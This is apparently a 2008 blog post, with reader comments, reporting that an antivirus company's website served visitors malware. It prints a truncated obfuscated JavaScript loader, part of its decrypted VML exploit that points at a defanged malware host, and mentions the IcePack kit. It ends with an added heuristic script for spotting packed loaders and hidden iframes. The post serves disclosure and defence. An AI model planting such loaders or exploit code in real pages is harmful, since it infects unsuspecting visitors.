Antivirus company website is infected!!!
UPDATE (08/02): The malicious IFRAME has been removed. Web admins should know the various methods of attack, keep their sites and servers updated, and audit them.
What do you think when an antivirus company’s website is itself infecting its users? That is about the most alarming situation in web security, and it shows the problem with surfing supposed-to-be-trusted websites.
This happened to the antivirus website of Delhi (India) based AVsoft Technologies, http://www.s-cop.com.
Their product, “SmartCop Antivirus”, is capable of detecting malware!
The infection is carried out by exploiting common vulnerabilities using an encrypted script. In this case it looks like this:
<script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,37,11,46,55,34,16,14,60,58,0,0,0,0,0,0,18,24,29,45,6,38,48,41,61,50,33,17);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}dc("gPjEXVXIadA4ie8IN0zSARiSdT8eNqcLfhpMNhiIpq8vnqCIoVX5DypIW……….
which decrypts to
<html xmlns:v="urn:schemas-microsoft-com:vml"><head>
<object id="VMLRender" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">
</object>
<style>
v\:* { behavior: url(#VMLRender); }
</style>
</head>
<body><div id="myDivA"></div>
<script language="JavaScript">
 function bxdbSGIA(Z0gP3oql, Bwpp5g4P)
 {
  while (Z0gP3oql.length*2<Bwpp5g4P)  ….
function Attack(n)
 {…
'<param name="src" value=" http://ntkrnlpa[dot]info/rc/exe[dot]
………
Just see the screenshots below…
All of this is used by the infamous (in underground networks!!) tool “IcePack”. You can see the admin console below.
Already reported to the concerned authorities.
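One way a web admin could run the audit the update above calls for, as an added example that is not part of the original post: a heuristic scan of served HTML for a packed script loader of the shape shown above and for hidden off-site iframes. The allowlist host, thresholds, rule names and sample pages are assumptions constructed for illustration.

```javascript
// Added example: heuristic audit of served HTML. Names and thresholds are assumptions.
const OWN_HOSTS = ['www.example.test']; // hypothetical allowlist of hosts you control

// Flag iframes that are invisible AND load from a host outside the allowlist.
function auditIframes(html) {
  const findings = [];
  const re = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const attrs = m[1];
    const src = (/\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(attrs) || [])[1] || '';
    const host = (/^(?:https?:)?\/\/([^\/:?#]+)/i.exec(src) || [])[1];
    const hidden = /\b(?:width|height)\s*=\s*["']?[01]\b/i.test(attrs) ||
      /display\s*:\s*none|visibility\s*:\s*hidden/i.test(attrs);
    if (host && hidden && !OWN_HOSTS.includes(host.toLowerCase())) {
      findings.push({ rule: 'hidden-offsite-iframe', detail: host });
    }
  }
  return findings;
}

// Flag inline scripts that hold a long packed literal, rebuild characters from
// numbers, and write or evaluate the result: the shape of the loader in the post.
function auditPage(html) {
  const findings = auditIframes(html);
  const re = /<script\b[^>]*>([\s\S]*?)(?:<\/script\s*>|$)/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const body = m[1];
    const packed = /["'][^"'\s<>]{200,}/.test(body); // 200 is an assumed threshold
    const decodes = /String\.fromCharCode|unescape\s*\(/.test(body);
    const emits = /document\.write(?:ln)?\s*\(|\beval\s*\(/.test(body);
    if (packed && decodes && emits) {
      findings.push({ rule: 'packed-script-loader', detail: body.slice(0, 40) });
    }
  }
  return findings;
}

// Constructed sample pages (not captured from the site described in the post).
const PACKED = 'A'.repeat(240); // stand-in for an encoded payload
const SAMPLE_INFECTED = '<html><body><h1>Products</h1>' +
  '<script language=JavaScript>function dc(x){var r="";for(var i=0;i<x.length;i++)' +
  '{r+=String.fromCharCode(x.charCodeAt(i))}document.write(r)}dc("' + PACKED + '")</script>' +
  '<iframe src="http://injected.example.invalid/x" width=0 height=0></iframe></body></html>';
const SAMPLE_CLEAN = '<html><body><script>document.write(new Date().getFullYear())</script>' +
  '<iframe src="http://www.example.test/map" width="600" height="400"></iframe></body></html>';

console.log(auditPage(SAMPLE_INFECTED).map(f => f.rule), auditPage(SAMPLE_CLEAN).length);
```

Run it against the HTML your server actually returns to visitors, since injected markup may not be present in the source files on disk.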
February 8, 2008 at 11:01 am
Antivirus company infects its own customers (ENG)
Indian company that markets the SmartCop Antivirus product cripples it so that it does not detect malware and makes use of a vulnerability to use an encrypted script to slip its customers the IcePack software, which is a tool for installing malwa…
February 8, 2008 at 12:40 pm
There are lots of other tools that do the same things, such as MPack, FirePack, WebAttackers.. The need is to have up-to-date software and secure programming code so that no RFI or code injection
February 27, 2008 at 5:56 am
[…] Sarah wrote an interesting post today onHere’s a quick excerptWhat do you think if an antivirus company’s website itself infecting the users? Well that’s the most alarming situation about web-security and problem of surfing suppose-to-be trusted website. The same happened to Delhi (India) based … […]
May 24, 2008 at 7:59 am
[…] What do you think if an antivirus company’s website itself infecting the users? Well that’s the most alarming situation about web-security and problem of surfing suppose-to-be trusted website.
The same happened to Delhi (India) based AVsoft Technologies’s antivirus […]
May 2, 2009 at 12:15 pm
I must say, I could not agree with you in 100%, but it’s just my opinion, which indeed could be wrong.
p.s. You have a very good template. Where did you find it?
May 2, 2009 at 12:18 pm
That’s an interesting article. I just wondered if you could tell me where to find more info on this topic?
February 27, 2010 at 8:45 pm
Really nice post. Very Informative and helpful post.
November 24, 2010 at 10:48 pm
Thank you. Awesome submissions you have here. Got some extra sites to direct to which have a bit more info?